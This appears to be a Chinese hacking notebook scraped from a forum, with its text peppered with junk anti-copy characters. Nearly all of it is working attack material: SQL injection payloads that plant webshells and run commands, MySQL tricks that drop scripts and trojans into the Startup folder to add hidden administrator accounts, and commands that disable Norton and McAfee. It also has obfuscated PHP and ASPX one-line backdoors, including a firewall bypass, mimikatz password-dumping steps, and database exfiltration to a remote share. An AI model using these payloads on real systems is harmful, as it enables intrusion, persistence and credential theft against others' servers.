6 I% l  n- ^' r; |  p! f   而终端所对应的服务名为:TermService
1 {( o/ @, t1 G第二步:用netstat -ano命令,列出所有端口对应的PID值!
8 W- C( I( q! |; `8 K   找到PID值所对应的端口
# b( U7 S5 i) e6 R
* ~2 S; F7 f4 y查询sql server 2005中的密码hash6 J0 Y. ]1 X( n& ?
SELECT password_hash FROM sys.sql_logins where name='sa'* I$ D) Z( ?6 p# B* h; r4 Q+ a
SELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
) U/ W% H0 s/ l* N5 n# baccess中导出shell1 [" g8 M7 K! ^0 f$ Y2 D4 @6 u( \% c

* M) O$ a' ]1 {中文版本操作系统中针对mysql添加用户完整代码:
# x% M7 `- u2 q; a. `) v7 o$ l4 C) \: n
use test;; s- j) `0 u. \! C7 ]( m% g
create table a (cmd text);
+ r3 E: T( \7 ]' f; [; \insert into a values ("set wshshell=createobject (""wscript.shell"") " );, k6 b  k3 W) {: t; v
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
2 Z/ Z2 [7 N' r1 @( j  j5 v* B% t! J' Zinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
* i) ~0 c0 @' k: |0 @select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";+ f, {; u( k4 c$ y8 C$ v8 }) v
drop table a;) c$ _6 c- ?) f$ ^; t$ c8 E

/ H+ k0 ?: E" n3 s7 n英文版本:1 T1 V5 A9 q6 N& h2 V

5 L$ f$ L* n& A  @0 r, Duse test;1 m  A' s+ V# S( a% r3 E6 \
create table a (cmd text);
( C6 H0 _: w* M6 dinsert into a values ("set wshshell=createobject (""wscript.shell"") " );! W; h" }3 ~; F+ Y8 i
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& P+ i! v5 W" A& m$ ]# M! f: Z
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );
: O- I* N8 {3 c. Dselect * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";+ L3 r% d+ u7 O3 Y, `6 Z, y, q+ D
drop table a;8 G; n' I9 H. R5 `) q- I) }3 h+ @4 j. X

8 O9 M' K6 v# n1 l1 acreate table a (cmd BLOB);# F/ @+ K( M+ |- s6 T
insert into a values (CONVERT(木马的16进制代码,CHAR));
, H" E& V( I) J& bselect * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
3 B5 T" W. Q5 B+ _$ T3 d, M2 ldrop table a;
+ S7 q/ e5 ^# [& i5 _% _
: Y) c9 r  H3 @; C记录一下怎么处理变态诺顿
3 F1 ^+ m/ [) E! w* w( ?: \3 L- L查看诺顿服务的路径4 }: M$ X8 v# d" W5 ~$ O$ m9 s
sc qc ccSetMgr
7 }3 Q$ F5 ]% K9 k/ m, v, c然后设置权限拒绝访问。做绝一点。。5 j; a3 H4 b7 T- e* e
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system
' e, `6 k" ^- ^cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"
) t  b2 O! S7 M- R+ ]. b5 _4 U/ wcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators/ Z  v' ?' @/ m4 I0 }2 X: N
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone, J! {8 R9 i. T# `, R

# W1 f- s- f" e8 f* j1 p然后再重启服务器
8 ~8 _5 ~  g1 @! n0 Uiisreset /reboot% |9 \4 F, ?6 l, D6 s+ y
这样就搞定了。。不过完事后。记得恢复权限。。。。
  j: b, }/ T0 y: m- }% P0 d3 M, Dcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F1 I* @- Y! Q4 v0 L/ k  k4 w
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F
5 X- w! G( q5 ^( icacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F
4 j/ y6 i0 ~5 N( d$ l, [3 k/ o  Bcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F
. q8 H: q8 n% aSELECT '<%eval(request(chr(35)))%>' into [fuck]  in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin1 J0 r" Z9 ^" i" @+ B

, B4 K! w0 r/ ~1 nEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')
6 d4 a& H4 ]% w% A( O
+ l" A4 a5 @% a- I9 v- npostgresql注射的一些东西
" C2 N8 k5 a! S8 Y如何获得webshell
+ I6 y9 [7 \  m; i: q2 Fhttp://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null);
1 k5 j3 N5 e6 P1 ehttp://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
! z3 z+ Y7 R6 M0 C$ O5 \0 \http://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;$ r+ E) \& M/ p. P
如何读文件
' z/ Y2 `& V% T5 v, `7 D, w! A' Vhttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);  w* x  A5 \% f+ O6 k; R
http://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;6 W; Z6 z9 Q/ @3 w1 `6 A- E2 ]
http://127.0.0.1/postgresql.php?id=1;select * from myfile;7 {% v+ ]$ e8 M/ |9 l; i8 G+ E/ ~+ C
4 l3 s; Q1 m8 h! K* e
z执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。* x3 e8 O2 z8 Z8 _
当然,这些的postgresql的数据库版本必须大于8.X* s) b/ _; h% H7 z) @6 G6 e9 K
创建一个system的函数:
: x) z% u4 B. u+ u8 fCREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT% a( b. Z% y! j5 Z4 {9 o( V

" r  g# c3 P# G- y  o$ h! [创建一个输出表:  `7 e0 t$ s  z- q$ Q6 K% B
CREATE TABLE stdout(id serial, system_out text). U' z1 Z0 d4 m- D9 p5 k
* X8 A2 H# V7 t% Q6 g& b4 G3 @
执行shell,输出到输出表内:
: g; V. u1 I/ a8 d" F. ASELECT system('uname -a > /tmp/test')
4 R1 m8 S& w& }4 W  S% ~& w8 I: G
copy 输出的内容到表里面;
6 P4 |, E/ o+ l% o& dCOPY stdout(system_out) FROM '/tmp/test'4 c. [7 ?6 L' c5 ]; ^0 _
; J- X3 p: y4 @, i; o
从输出表内读取执行后的回显,判断是否执行成功4 s. ?- j8 U' o' m
* Z8 V) R# |% s9 @. K
SELECT system_out FROM stdout* u# u8 a# C9 f
下面是测试例子
7 v& Z; ?8 S+ q4 O0 B. J- i$ J& J; _% m6 N0 P8 A4 o# A
/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) -- + X3 A! J  Y0 Z7 i( L

) S! {; x7 h$ x/ B/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'
6 J, a- g2 u* lSTRICT --' Y; v" Q, J: _2 }; E+ t+ ?
0 t3 Z. r: U6 T7 z( ]
/store.php?id=1; SELECT system('uname -a > /tmp/test') --
  d: S) P5 E! a% T3 E/ h9 L# t% G+ |- j- K* i7 `
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --+ q- Q4 F+ e  g& B2 V( ~

6 m6 a! [; ^- q9 |! S/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--
$ {( G0 b7 _$ |2 m# pnet stop sharedaccess    stop the default firewall, E( L1 v4 }7 o; W# t/ t0 k3 O
netsh firewall show      show/config default firewall
- m3 G, {- s# T! snetsh firewall set notifications disable   disable the notify when the program is disabled by the default firewall
( J2 l, g1 Z. |0 c( d& s6 nnetsh firewall add allowedprogram c:\1.exe Svchost     add the program which is allowed by default firewall: [( P+ R, \. [& i% _) D
修改3389端口方法(修改后不易被扫出)6 A$ _4 u5 B1 K+ J  {7 V7 M/ d+ y5 E
修改服务器端的端口设置,注册表有2个地方需要修改
2 ^5 y9 F7 X9 j9 r0 [) M7 Y& h2 \/ O2 G
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
( i  t5 x1 a2 N! |! rPortNumber值,默认是3389,修改成所希望的端口,比如6000
. N1 m+ k) l2 x7 a
) U6 F' N. i1 a第二个地方:- v, m8 e4 g, `- U% b, ?
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] 
7 R  i; K' L; G# |$ PPortNumber值,默认是3389,修改成所希望的端口,比如6000) V; _4 i4 z8 {9 ]6 V7 B5 e3 {# @& [5 u
; w6 }) z- a' x- u0 f5 K
现在这样就可以了。重启系统就可以了) z: m0 _+ H, H, D8 q- \  I9 U5 [1 A
  p; D1 c! C- Q: a2 g7 {
查看3389远程登录的脚本- ~, ^/ L4 f* _2 U
保存为一个bat文件
1 I2 q3 r8 ]9 Pdate /t >>D:\sec\TSlog\ts.log
9 C  Z0 k. A; ?8 R3 ?time /t >>D:\sec\TSlog\ts.log
3 L; u' q! M, Z6 {+ V9 `netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log2 t3 ]3 _0 s. `: I4 Y. W/ A
start Explorer
/ I( r1 ]: ^# f# h
& V- Z, t9 b4 V  R8 Cmstsc的参数:
1 ~" c# ]" K' g9 t4 e; v
( E! V5 |; H$ F* ?/ f远程桌面连接
$ ]; M$ d' i8 s: |" ^/ N" n! N# k0 Y& K8 B# E+ ^5 f
MSTSC      [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]
. n; b, {( R  m7 w  [/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?, b0 @4 T; c4 p* g4 m
9 T( A! K+ ~1 E6 e# r' V9 B' @2 T
<Connection File> -- 指定连接的 .rdp 文件的名称。
. ]1 k: W$ }% W% J! {7 H! y' a: S( m, l* N% x) d- B" o/ r
/v:<server[:port]> -- 指定要连接到的终端服务器。- F+ i, z/ O* C# t
4 ?& }" k$ x. a
/console -- 连接到服务器的控制台会话。
) V9 \7 o: s) B0 a& @9 Q$ x' t/ V1 l/ z. g! x% G
/f -- 以全屏模式启动客户端。
7 q. H0 O' W0 n# _& i0 c+ ^+ _$ L+ C
/w:<width> --  指定远程桌面屏幕的宽度。, k% f% n3 ^4 b5 p! U/ x: h, M" P

1 O' H. ~( A" \8 b7 d5 ^1 r/h:<height> -- 指定远程桌面屏幕的高度。
1 ?. w& d, f& b3 `2 w/ q; L" ^5 h7 A+ v( H
/edit -- 打开指定的 .rdp 文件来编辑。
, G& Z# Y$ L- X; ~3 _8 t$ y4 W7 z0 S* A* r9 s  p' J7 t
/migrate -- 将客户端连接管理器创建的旧版
6 z6 t) f4 E# a' F6 U+ e  ~连接文件迁移到新的 .rdp 连接文件。
7 Y9 v1 ]1 F! \5 E0 S, A+ Q& j. H% ^: H& w; `+ }" a2 r
1 A4 N, \. J2 ]+ o8 g
其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就! ]9 T( n! w9 K; T! A9 _$ n3 Y: {/ n
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量; K4 [( C* y0 c; Q( Q
  o/ |, k) z3 E6 V7 I. U. ?
命令行下开启3389( O+ y/ f: T6 N3 A+ ?: e
net user asp.net aspnet /add, k# P0 b0 ^" {
net localgroup Administrators asp.net /add
* [) C0 ?+ U+ j, d& ^9 Y) Vnet localgroup "Remote Desktop Users" asp.net /add
7 z3 g% \3 y7 cattrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D; }) [, J2 K5 X
echo Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
) p' K. [9 Y) S! P6 z; ^* Becho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1
2 v' q4 ?) }0 r" v+ \  P1 Vecho Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f
# ~4 U0 V) [* y" _sc config rasman start= auto* p$ z  _+ A* r# X- _1 m
sc config remoteaccess start= auto
* |* a* s- {( z4 Jnet start rasman
. T. {' W, c" snet start remoteaccess
- O* N5 e* J  c5 B; a% qMedia1 w2 L% D2 w; L- p# O
<form id="frmUpload" enctype="multipart/form-data"- _! P- ]; q8 e
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
, \* f3 v# q9 x<input type="file" name="NewFile" size="50"><br>
5 N4 \& y% n7 C1 y, q9 I: Q6 H! v+ b<input id="btnUpload" type="submit" value="Upload">/ t0 }3 J5 a6 C: C4 Y
</form>
6 k1 k- b9 _( r" j3 X+ Q
% q, n4 C& \) |control userpasswords2 查看用户的密码$ }1 _7 l' p8 H7 ]4 J- c
access数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
; l2 b2 {4 s+ E$ A& B: P1 kSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a
* k$ q' a9 |" A( L7 E  `* j5 R9 d: h& Z/ x- M# v  X# ?( z- @
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:" k4 S0 l$ u8 d3 c4 J
测试1:: r+ i, B5 V2 m9 g9 t
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
6 ~' y# O# }9 L  `4 B9 [: j4 j9 |; t; i/ j
测试2:
; N/ D8 w! q/ u* D! p. _. c% c  m* u# s5 h8 J
create table dirs(paths varchar(100),paths1 varchar(100), id int)
1 }! e% w' E- r1 `8 t4 H; R% [& E; k0 x- J. ]3 o- q
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
4 x. o+ O. d0 d- y6 ^8 r2 @: z
6 F7 T) x0 G7 ~4 J" gSELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
1 ?. V' [" s6 r关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
- d' Q+ k9 x7 l- ~: y# R) s0 N3 ?可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
" O5 P1 B9 ?( H6 _+ n; \) Snet stop mcafeeframework
1 ]5 I( m; g2 ?8 bnet stop mcshield
& a, @  \* h2 A' Znet stop mcafeeengineservice1 E, ^% f: M! @. g$ V( N: Y& R
net stop mctaskmanager
1 P, H- ]* b; Phttp://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D3 {+ \0 [" n! g3 {$ y3 ~) i' K

5 _+ [& V$ p2 G7 i: d& F  VNCDump.zip (4.76 KB, 下载次数: 1)   n% N5 }5 L0 n: E3 N$ z" R9 P
密码在线破解http://tools88.com/safe/vnc.php
5 u: H* z/ X* S8 |9 t* WVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取
. T; ], }" `. \) g5 C( j, |
: M5 E/ H; i/ V7 j" T; Bexec master..xp_cmdshell 'net user'. y0 `9 b: q- u" ?
mssql执行命令。1 S$ }- C/ F( j- V5 E* Y
获取mssql的密码hash查询; N1 `4 S  S6 o3 ^6 p3 o
select name,password from master.dbo.sysxlogins
  a  }. M% C& |$ `  k  `* \/ |) d
1 N4 X( z% K' w7 ?4 hbackup log dbName with NO_LOG;, C* _" U6 H9 ^2 ^' b
backup log dbName with TRUNCATE_ONLY;+ }) x0 V* }* @0 f/ x0 |
DBCC SHRINKDATABASE(dbName);# F/ o) O4 g7 Z8 x  X3 z2 u+ w# {
mssql数据库压缩
8 o9 M5 B7 ]8 e* G5 c# o8 I" T$ C: O" E
Rar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK& ^. a% _+ d7 j6 T
将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。
) R4 n; F0 j, M4 N& O
' ]+ v- a& s8 R/ E' {( e1 ]backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
! d5 s9 T" M! N! ^1 h备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
6 V. E; Q) l5 D3 }0 n/ k8 _8 B+ {2 y3 m
Discuz!nt35渗透要点:
2 ]6 ~1 N5 d$ T4 X8 y: a(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default2 `9 Q3 P& \% z! U7 _5 l& p3 E3 }
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>0 i/ H* i1 F! @$ {* q! }
(3)保存。
( h; `) i2 ^' {( f& D) o3 x% Q' r(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass7 c  N9 C4 Q) z2 N0 ]( b5 I: p
d:\rar.exe a -r d:\1.rar d:\website\
6 @) F5 ?" y4 j! b% W. u" p: `递归压缩website
. y# C3 B$ j0 w  r$ L2 ~  a% }注意rar.exe的路径' T0 {) G( {# O! V3 \+ I2 K
# y2 W- X7 r' P+ f" L
<?php+ G; p( }3 D, d5 ]5 [

6 V6 G) Q4 W4 x5 [3 F$telok   = "0${@eval($_POST[xxoo])}";5 F6 \* `, k, {. i6 e, c1 v

7 H. s/ _: @% G& F4 M6 l+ J$username   = "123456";
4 w) H2 U: K  q8 Q: w9 {6 y: P2 X; L% K
! R% D* g* }8 R3 _, m* t( W: j$userpwd   = "123456";
4 [. \$ N9 @. m8 |# B" Z9 }$ {; o8 O  B  C
$telhao   = "123456";
7 A: e& }; c  w' d3 ]- G- }; ^  ]: ^8 ]
$telinfo   = "123456";! W* a1 D' a0 d  Z* N& K
8 Y0 @/ M+ w/ J! \. Y6 r7 F4 \
?>* [3 O4 s* P& l# G2 i: @" d; I
php一句话未过滤插入一句话木马
* q; l7 k+ s- u* ?$ k( ]9 j
: E" ^; J3 M$ B. Y/ z7 y+ T5 i站库分离脱裤技巧, w3 g. C# p/ u3 q: p
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'
: D7 N, H5 R: C4 ]  ~exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'' [2 c* c3 e+ B) V
条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
! ]; m0 @2 H/ j这儿利用的是马儿的专家模式(自己写代码)。" @* `6 t& `' T8 F7 `
ini_set('display_errors', 1);/ Z3 U( x" ?. J* C; ]
set_time_limit(0);
6 x' i8 X: ^6 p* herror_reporting(E_ALL);
. F% X/ I& r7 r8 O% \$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());  V  L) O+ B& ?
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());9 P1 K4 w- b3 s! H; R
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());/ t  C% r. N$ A% w8 u) d
$i = 0;
) p  t$ y1 h1 M3 Q, I' }4 j. M$tmp = '';
! {: U& ^# O, ywhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
$ T$ s/ i# S! t9 m    $i = $i+1;$ a/ E7 I1 d7 \2 a. O0 X
    $tmp .=  implode("::", $row)."\n";& B7 N' i" S* A& I& |9 z* Y
    if(!($i%500)){//500条写入一个文件
) Y; C, p4 o$ p        $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
- I  S  S( n) J        file_put_contents($filename,$tmp);
4 z7 C' m$ N, q- c! Q        $tmp = '';9 C- b: e, [, z2 d9 m  c! d
    }
" M$ I1 Z* g7 `. O: G}
+ a- Y' t3 {, B5 i* R& mmysql_free_result($result);
% c! ?* L; }1 Z+ k& n# z" x, |7 d8 R& N+ y5 y2 k3 F. U
1 Y" B( U/ U, o+ e& P
3 e) x* s( h0 _- K" M/ Y
//down完后delete
9 K' `" d) c, U1 a" c! ?- T" _* J  h/ H! G4 f

1 K" N1 r$ P: g6 D7 Sini_set('display_errors', 1);
. H& L# q6 Z4 |error_reporting(E_ALL);& P' }% J+ @) q; z! d5 n) i
$i = 0;1 j( W; X& S1 U8 ]) O% G, K" O
while($i<32) {9 ?" u' @8 B# b9 G/ e" O
    $i = $i+1;
8 |. k" W1 D+ ]7 B        $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';
0 \2 i" \  Q7 J1 U        unlink($filename);
% {" z; W: Z0 S" I7 `8 \5 i} : Q- K5 q% s  D5 P' R4 Q
httprint 收集操作系统指纹
5 w) t8 q5 B3 z: A" J/ q  `, V扫描192.168.1.100的所有端口
; m% K3 T; O" Unmap –PN –sT –sV –p0-65535 192.168.1.1006 P/ D+ d3 t4 @" H6 c+ E0 X7 E1 E
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
* F1 ?/ Y' a( ~. Qhost -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输6 ?8 b8 q8 P: Y/ H9 ]  {) i0 y  P9 s
Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host5 U* p* N5 @- {- y3 ^: d

0 g7 O/ r. i0 p. ]Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)4 t7 s9 M: z+ M

9 s9 q8 v% m, f. z) W" E" t. [  MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)3 O0 C: D# a$ @' U( m" Y! `/ G4 ~

, _- _5 n" }+ q$ z; F  Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
' ]  L4 U+ {5 E" k
/ G, y) h. k1 [( W  DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
* R0 G# f4 ]- P+ B, f) U0 h& f, ~' w1 z2 c* J( O- h0 X
  http://net-square.com/msnpawn/index.shtml (要求安装)
5 N4 i! L9 J4 D+ n7 N
+ u& w3 P- h6 N# [) p  tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)$ V* h' T( r7 S  ~2 Z+ O

1 Z, E) H* l# U3 r$ Q  a/ N' ~1 L  SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)
4 i& I4 N3 _0 z/ l) Z7 {set names gb2312
  Y7 P. ]) B# {  M导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。. v0 l. s, s* [3 ~" g. M0 D( ?
& N* m& q( E- ~% G7 ?
mysql 密码修改
4 C, L' I$ p  t- Z" XUPDATE mysql.user SET password=PASSWORD("newpass")  whereuser="mysqladmin ” 0 k. T6 _" s0 d& k5 a- v0 K# r: Q6 [( q
update user set password=PASSWORD('antian365.com') where user='root';
! M, }( G2 v4 b6 b! K4 m2 Wflush privileges;* v8 }9 K% D" B% K7 y6 i5 L
高级的PHP一句话木马后门
, T2 Y- N% J1 a3 }! h
0 |: y, D  D( y. f) t$ G, w9 O入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀, e0 o- R' Z) L8 L6 P- x* U
$ o, d7 Q& `# y& b
1、
4 g9 c& g9 O! k3 Q* c# z0 p8 R: Y/ ?: U8 L7 y6 g! @( l/ M
$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
6 f  T" F; \; B; Z& X3 L
- r7 `3 N0 Z& z$hh("/[discuz]/e",$_POST['h'],"Access");1 `: i9 o$ h2 x* d* h" v

7 H8 f2 A# e5 {' n& B! v//菜刀一句话
) g8 n0 X% f0 P, N
0 x* w8 F* V6 v8 [  S2、% K5 P5 T, y, M1 V2 N

. S$ I8 P" Q# ~  q6 y$filename=$_GET['xbid'];
* q0 s) d5 D. R" Z  k
8 v& x9 F, n4 ?0 _* iinclude ($filename);
. D5 Y/ i" m) O2 B4 H* ]! _) |- {+ m! B( y3 }
//危险的include函数,直接编译任何文件为php格式运行
8 u; Q5 s' G) a. k: v2 T* n
8 j/ E3 P4 p4 e, I0 S! t3、# S( _$ t0 y2 ?) e( G& D, b

) @  D2 H2 L4 l3 A$reg="c"."o"."p"."y";
0 K; i/ W0 D7 s4 x. \2 ]6 `& {$ C7 `. |
+ @6 y* a( a* T$ Y$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
* r6 r8 H1 u! t' m* V! C/ f& B9 K# p5 |$ V2 F8 Q! [# M- F/ E' [4 p
//重命名任何文件
( @6 N/ e: D, i
: w7 {# u$ d- y4、
: t6 O% m. D  A; i- a% v: E2 ?" q& _  x
$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
  z/ \: X) V- n9 i
9 E9 Q$ I& F& a* R' C+ t$gzid("/[discuz]/e",$_POST['h'],"Access");
+ x* n% p7 Q( v* Z" U. h# J) j; V; n6 v( P0 ]' m
//菜刀一句话
6 @  `9 O, j2 {& t
* t/ b& f, j, i# q3 b8 \5、include ($uid);
" a) d; z0 ]+ p+ O1 K: E
$ E- |! x7 {7 ^1 h' N) V1 _0 V//危险的include函数,直接编译任何文件为php格式运行,POST
" D# t+ {! |) W7 ]8 i, T+ ~' F. B' m, O0 q/ |

7 b* Z; j2 }' p, `7 y2 E//gif插一句话" U6 e+ p0 P4 o; Q; u$ [" F% M; g
. q+ T" R* Q' d) b& Q. s( P% D
6、典型一句话0 q8 D3 l; z1 G  w

1 c/ S# K- J, m" [/ m8 {- p5 x程序后门代码
6 l, h* u7 h; f<?php eval_r($_POST[sb])?>1 C+ f& X. u" S3 U3 V: _. T. D
程序代码
$ N2 c; z& |: q' Q" D+ _0 b& ^1 |! m<?php @eval_r($_POST[sb])?>
9 W# Z$ K/ g$ Z! t& b* k//容错代码2 A- u' Z2 M) W) p0 X% o6 a0 V
程序代码
- e1 W% ?0 _# ?; N% c. ~0 [<?php assert($_POST[sb]);?># k5 X# u7 C9 Z# \
//使用lanker一句话客户端的专家模式执行相关的php语句% M' J4 Z" j) F" L
程序代码
8 x, S3 \% E5 P% y7 y& E<?$_POST['sa']($_POST['sb']);?>
* f: ]0 k" Q: ~/ P程序代码" y. p, j, Y/ _, V
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?># D" n# ~7 T5 q# h
程序代码3 K1 E" r  G) H, U2 h8 r7 U
<?php
$ s. E3 C1 b6 \9 A: E6 ~@preg_replace("/[email]/e",$_POST['h'],"error");) M. A$ Z4 |7 ?3 c' |' [* W8 I" Y
?>/ [# D; `* Y* B; j6 [
//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入
9 z, W* T& T  F9 F程序代码/ {- C! ~% N; e, V& A2 R
<O>h=@eval_r($_POST[c]);</O>
  \  D: y; r6 _5 W# x3 [程序代码
) @/ f) g8 q! A  {' Y<script language="php">@eval_r($_POST[sb])</script>
$ y$ w/ [, P" {  K9 j//绕过<?限制的一句话0 A2 y# i; Z) ?# d5 l
- i3 F) [2 o+ S; m. O4 g1 I+ w1 e  _
http://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip1 T  z, b/ F$ X! R0 m. |0 D
详细用法:1 H# {/ T* L0 T/ i: [4 I% T2 a* x
1、到tools目录。psexec \\127.0.0.1 cmd
7 G1 Z' O, T: W6 I! N! G: Y" ?: o2、执行mimikatz- J/ _+ L& U7 g/ j* c2 Q4 T3 w+ a/ }
3、执行 privilege::debug$ H- X+ D# c- X
4、执行 inject::process lsass.exe sekurlsa.dll2 r5 p. G' d- w4 a; N
5、执行@getLogonPasswords
! K) _3 Q2 |5 q4 S. s: h) Z8 G; V- G) B6、widget就是密码% x. D$ F/ y! E& d* z) p
7、exit退出,不要直接关闭否则系统会崩溃。
  O- U8 L% V2 e1 a5 p
, m$ y- D% N6 o" Z/ q) A# Mhttp://www.monyer.com/demo/monyerjs/ js解码网站比较全面
: E8 B  n' F1 m% U+ P  g! i) u) h- C: n
自动查找系统高危补丁
, q% @& L; Q: p* ~7 q& Isysteminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt8 _% b+ Q" f- |9 ]* e6 |
7 r0 ~+ ^, Z5 r; c3 T, t1 M* @
突破安全狗的一句话aspx后门
3 Z7 y1 f8 M, C# a<%@ Page Language="C#" ValidateRequest="false" %>0 Y: ~$ |) L+ P' ~
<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>7 K  z# ^& D( ?' a* G
webshell下记录WordPress登陆密码
